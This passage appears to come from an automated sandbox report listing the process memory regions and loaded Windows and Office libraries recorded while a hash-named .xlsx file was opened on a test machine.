"wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 656 start_va = 0x67930000 end_va = 0x67aa2fff monitored = 0 entry_point = 0x67931000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 657 start_va = 0xb070000 end_va = 0xb071fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b070000" filename = "" Region: id = 658 start_va = 0xb080000 end_va = 0xb08ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b080000" filename = "" Region: id = 659 start_va = 0xb080000 end_va = 0xb08ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b080000" filename = "" Region: id = 660 start_va = 0x67910000 end_va = 0x67920fff monitored = 0 entry_point = 0x67918fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 661 start_va = 0x67850000 end_va = 0x6790efff monitored = 0 entry_point = 0x67881e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 662 start_va = 0xb080000 end_va = 0xb08ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b080000" filename = "" Region: id = 663 start_va = 0x677c0000 end_va = 0x67840fff monitored = 0 entry_point = 0x677db260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 664 start_va = 0xb080000 end_va = 0xb238fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 665 start_va = 0x160b0000 end_va = 0x1692dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 666 start_va = 0xb240000 end_va = 0xb240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b240000" filename = "" Region: id = 667 start_va = 0xb250000 end_va = 0xb250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b250000" filename = "" Region: id = 668 start_va = 0xb260000 end_va = 0xb261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b260000" filename = "" Region: id = 669 start_va = 0xb270000 end_va = 0xb270fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b270000" filename = "" Region: id = 670 start_va = 0x16930000 end_va = 0x16e21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016930000" filename = "" Region: id = 671 start_va = 0xb280000 end_va = 0xb281fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b280000" filename = "" Region: id = 672 start_va = 0xb290000 end_va = 0xb290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b290000" filename = "" Region: id = 673 start_va = 0xb2a0000 end_va = 0xb2a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b2a0000" filename = "" Region: id = 674 start_va = 0xb260000 end_va = 0xb29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b260000" filename = "" Region: id = 675 start_va = 0xb2a0000 end_va = 0xb39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2a0000" filename = "" Region: id = 676 start_va = 0x703b0000 end_va = 0x7052dfff monitored = 0 entry_point = 0x7042c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 677 start_va = 0x71af0000 end_va = 0x71dbafff monitored = 0 entry_point = 0x71d2c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 678 start_va = 0xb240000 end_va = 0xb241fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 679 start_va = 0xb3a0000 end_va = 0xb3a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 680 start_va = 0xb3b0000 end_va = 0xb3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3b0000" filename = "" Region: id = 681 start_va = 0xb3f0000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3f0000" filename = "" Region: id = 682 start_va = 0xb4f0000 end_va = 0xb4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4f0000" filename = "" Region: id = 683 start_va = 0xb260000 end_va = 0xb29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b260000" filename = "" Region: id = 684 start_va = 0xb2a0000 end_va = 0xb39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2a0000" filename = "" Region: id = 685 start_va = 0xb500000 end_va = 0xb53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b500000" filename = "" Region: id = 686 start_va = 0xb540000 end_va = 0xb540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b540000" filename = "" Region: id = 687 start_va = 0x16e30000 end_va = 0x16f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016e30000" filename = "" Region: id = 688 start_va = 0xb540000 end_va = 0xb541fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "networkexplorer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\NetworkExplorer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\networkexplorer.dll.mui") Region: id = 689 start_va = 0x16f30000 end_va = 0x17053fff monitored = 0 entry_point = 0x16f34920 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\SysWOW64\\networkexplorer.dll" (normalized: "c:\\windows\\syswow64\\networkexplorer.dll") Region: id = 690 start_va = 0x67690000 end_va = 0x677b3fff monitored = 0 entry_point = 0x67694920 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\SysWOW64\\networkexplorer.dll" (normalized: "c:\\windows\\syswow64\\networkexplorer.dll") Region: id = 691 start_va = 0xb540000 end_va = 0xb540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b540000" filename = "" Region: id = 692 start_va = 0xb540000 end_va = 0xb558fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b540000" filename = "" Region: id = 693 start_va = 0xc660000 end_va = 0xc678fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c660000" filename = "" Region: id = 694 start_va = 0x13680000 end_va = 0x13698fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013680000" filename = "" Region: id = 695 start_va = 0x16f30000 end_va = 0x17022fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 696 start_va = 0x16f30000 end_va = 0x17022fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 697 start_va = 0xb560000 end_va = 0xb560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b560000" filename = "" Region: id = 698 start_va = 0x16f30000 end_va = 0x16f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016f30000" filename = "" Region: id = 699 start_va = 0x16f70000 end_va = 0x1706ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016f70000" filename = "" Region: id = 700 start_va = 0xb560000 end_va = 0xb560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b560000" filename = "" Region: id = 701 start_va = 0xb560000 end_va = 0xb56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b560000" filename = "" Region: id = 702 start_va = 0xb560000 end_va = 0xb561fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 703 start_va = 0xce80000 end_va = 0xce8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce80000" filename = "" Region: id = 704 start_va = 0x16f30000 end_va = 0x1702ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_32.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_32.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_32.db") Region: id = 705 start_va = 0xce80000 end_va = 0xce8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce80000" filename = "" Region: id = 706 start_va = 0xc540000 end_va = 0xc54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c540000" filename = "" Region: id = 707 start_va = 0xc540000 end_va = 0xc540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c540000" filename = "" Region: id = 708 start_va = 0x67670000 end_va = 0x67685fff monitored = 0 entry_point = 0x676721d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 709 start_va = 0xb540000 end_va = 0xb548fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b540000" filename = "" Region: id = 710 start_va = 0xb550000 end_va = 0xb558fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b550000" filename = "" Region: id = 711 start_va = 0xc540000 end_va = 0xc54afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c540000" filename = "" Region: id = 712 start_va = 0xc660000 end_va = 0xc66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c660000" filename = "" Region: id = 713 start_va = 0x12bf0000 end_va = 0x12bf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012bf0000" filename = "" Region: id = 714 start_va = 0xc670000 end_va = 0xc670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c670000" filename = "" Region: id = 715 start_va = 0xce80000 end_va = 0xce80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce80000" filename = "" Region: id = 716 start_va = 0x17030000 end_va = 0x1742ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000017030000" filename = "" Region: id = 717 start_va = 0x12b80000 end_va = 0x12be6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx8044adcc8d12d6195f5eff78ccabxlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx8044adcc8d12d6195f5eff78ccabxlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx8044adcc8d12d6195f5eff78ccabxlsx") Region: id = 718 start_va = 0xcea0000 end_va = 0xcea0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cea0000" filename = "" Region: id = 719 start_va = 0x17030000 end_va = 0x1742ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000017030000" filename = "" Region: id = 720 start_va = 0x12b80000 end_va = 0x12be6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx8044adcc8d12d6195f5eff78ccabxlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx8044adcc8d12d6195f5eff78ccabxlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx8044adcc8d12d6195f5eff78ccabxlsx") Region: id = 721 start_va = 0x12b80000 end_va = 0x12be6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx") Region: id = 722 start_va = 0x12b80000 end_va = 0x12be6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx") Region: id = 723 start_va = 0x12b80000 end_va = 0x12c4dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab.xlsx") Region: id = 724 start_va = 0x15b50000 end_va = 0x15bcffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~dfcaab908f20a020df.tmp" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\~DFCAAB908F20A020DF.TMP" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\~dfcaab908f20a020df.tmp") Region: id = 725 start_va = 0x6c610000 end_va = 0x6c642fff monitored = 0 entry_point = 0x6c620e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 726 start_va = 0x15bd0000 end_va = 0x15c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015bd0000" filename = "" Region: id = 727 start_va = 0x15ca0000 end_va = 0x15e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015ca0000" filename = "" Region: id = 728 start_va = 0xf5d0000 end_va = 0xf5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f5d0000" filename = "" Region: id = 729 start_va = 0x713a0000 end_va = 0x7158efff monitored = 0 entry_point = 0x713e5e20 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 730 start_va = 0x15ca0000 end_va = 0x15e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015ca0000" filename = "" Region: id = 731 start_va = 0x15e60000 end_va = 0x15e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015e60000" filename = "" Region: id = 732 start_va = 0xb560000 end_va = 0xb560fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 733 start_va = 0xf5d0000 end_va = 0xf5d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f5d0000" filename = "" Region: id = 734 start_va = 0x15ca0000 end_va = 0x15d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015ca0000" filename = "" Region: id = 735 start_va = 0x15e00000 end_va = 0x15e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015e00000" filename = "" Region: id = 736 start_va = 0xf5e0000 end_va = 0xf5effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f5e0000" filename = "" Region: id = 737 start_va = 0xf5e0000 end_va = 0xf5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f5e0000" filename = "" Region: id = 738 start_va = 0x17430000 end_va = 0x1790dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000017430000" filename = "" Region: id = 739 start_va = 0x114c0000 end_va = 0x114cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000114c0000" filename = "" Region: id = 740 start_va = 0xb240000 end_va = 0xb24ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b240000" filename = "" Region: id = 741 start_va = 0xb240000 end_va = 0xb24dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b240000" filename = "" Region: id = 742 start_va = 0xb3a0000 end_va = 0xb3adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b3a0000" filename = "" Region: id = 743 start_va = 0x14070000 end_va = 0x144ebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014070000" filename = "" Region: id = 744 start_va = 0x181d0000 end_va = 0x1864bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000181d0000" filename = "" Region: id = 745 start_va = 0xc540000 end_va = 0xc541fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c540000" filename = "" Region: id = 746 start_va = 0xc660000 end_va = 0xc661fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c660000" filename = "" Region: id = 747 start_va = 0x114c0000 end_va = 0x114c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114c0000" filename = "" Region: id = 748 start_va = 0x114d0000 end_va = 0x114d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114d0000" filename = "" Region: id = 749 start_va = 0x114e0000 end_va = 0x114e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114e0000" filename = "" Region: id = 750 start_va = 0x13ef0000 end_va = 0x14349fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013ef0000" filename = "" Region: id = 751 start_va = 0x17910000 end_va = 0x17d69fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000017910000" filename = "" Region: id = 752 start_va = 0x114d0000 end_va = 0x114d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 753 start_va = 0x114e0000 end_va = 0x114effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 754 start_va = 0x13b90000 end_va = 0x13c38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013b90000" filename = "" Region: id = 755 start_va = 0x13b90000 end_va = 0x13c2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013b90000" filename = "" Region: id = 756 start_va = 0x660f0000 end_va = 0x66a3afff monitored = 0 entry_point = 0x6616ec58 region_type = mapped_file name = "igx.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\IGX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\igx.dll") Region: id = 757 start_va = 0x114f0000 end_va = 0x114f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000114f0000" filename = "" Region: id = 758 start_va = 0x67550000 end_va = 0x67667fff monitored = 0 entry_point = 0x675540b1 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msptls.dll") Region: id = 759 start_va = 0x12c50000 end_va = 0x12c6efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c50000" filename = "" Region: id = 760 start_va = 0x12c90000 end_va = 0x12caefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c90000" filename = "" Region: id = 761 start_va = 0x12c70000 end_va = 0x12c71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c70000" filename = "" Region: id = 762 start_va = 0x13180000 end_va = 0x13181fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013180000" filename = "" Region: id = 763 start_va = 0x133b0000 end_va = 0x133bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000133b0000" filename = "" Region: id = 764 start_va = 0x133c0000 end_va = 0x133c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000133c0000" filename = "" Region: id = 765 start_va = 0x13430000 end_va = 0x13430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013430000" filename = "" Region: id = 766 start_va = 0x13680000 end_va = 0x13696fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013680000" filename = "" Region: id = 767 start_va = 0x136a0000 end_va = 0x136a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000136a0000" filename = "" Region: id = 768 start_va = 0x137c0000 end_va = 0x137d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000137c0000" filename = "" Region: id = 769 start_va = 0x137e0000 end_va = 0x137e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000137e0000" filename = "" Region: id = 770 start_va = 0x137f0000 end_va = 0x137f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000137f0000" filename = "" Region: id = 771 start_va = 0x13c30000 end_va = 0x13c32fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c30000" filename = "" Region: id = 772 start_va = 0x13c40000 end_va = 0x13c42fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c40000" filename = "" Region: id = 773 start_va = 0x13c50000 end_va = 0x13c50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c50000" filename = "" Region: id = 774 start_va = 0x13c60000 end_va = 0x13c63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c60000" filename = "" Region: id = 775 start_va = 0x13c70000 end_va = 0x13c74fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c70000" filename = "" Region: id = 776 start_va = 0x13c80000 end_va = 0x13c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c80000" filename = "" Region: id = 777 start_va = 0x13c90000 end_va = 0x13c92fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c90000" filename = "" Region: id = 778 start_va = 0x13ca0000 end_va = 0x13ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013ca0000" filename = "" Region: id = 779 start_va = 0x13cb0000 end_va = 0x13cb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013cb0000" filename = "" Region: id = 780 start_va = 0x13cc0000 end_va = 0x13cc2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013cc0000" filename = "" Region: id = 781 start_va = 0x13cd0000 end_va = 0x13cd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013cd0000" filename = "" Region: id = 782 start_va = 0x71970000 end_va = 0x7199efff monitored = 0 entry_point = 0x7197bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 783 start_va = 0x74610000 end_va = 0x74616fff monitored = 0 entry_point = 0x74611e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 784 start_va = 0x718f0000 end_va = 0x71902fff monitored = 0 entry_point = 0x718f25d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 785 start_va = 0x133a0000 end_va = 0x133b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000133a0000" filename = "" Region: id = 786 start_va = 0x133c0000 end_va = 0x133c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000133c0000" filename = "" Region: id = 787 start_va = 0x13430000 end_va = 0x13430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013430000" filename = "" Region: id = 788 start_va = 0x13680000 end_va = 0x1368bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013680000" filename = "" Region: id = 789 start_va = 0x13690000 end_va = 0x1369bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013690000" filename = "" Region: id = 790 start_va = 0x136a0000 end_va = 0x136a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000136a0000" filename = "" Region: id = 791 start_va = 0x137c0000 end_va = 0x137c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000137c0000" filename = "" Region: id = 792 start_va = 0x13ce0000 end_va = 0x13d15fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013ce0000" filename = "" Region: id = 793 start_va = 0x13d20000 end_va = 0x13d55fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013d20000" filename = "" Region: id = 794 start_va = 0x13d60000 end_va = 0x13e04fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013d60000" filename = "" Region: id = 795 start_va = 0x718d0000 end_va = 0x718e3fff monitored = 0 entry_point = 0x718d3c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 796 start_va = 0x70170000 end_va = 0x70181fff monitored = 0 entry_point = 0x70174510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 797 start_va = 0x133a0000 end_va = 0x133a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 798 start_va = 0x13e10000 end_va = 0x13ee5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013e10000" filename = "" Region: id = 799 start_va = 0x14350000 end_va = 0x14425fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014350000" filename = "" Region: id = 800 start_va = 0x133b0000 end_va = 0x133bafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000133b0000" filename = "" Region: id = 801 start_va = 0x133c0000 end_va = 0x133cafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000133c0000" filename = "" Region: id = 802 start_va = 0x17d70000 end_va = 0x180f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000017d70000" filename = "" Region: id = 803 start_va = 0x18100000 end_va = 0x18486fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000018100000" filename = "" Region: id = 804 start_va = 0x71a70000 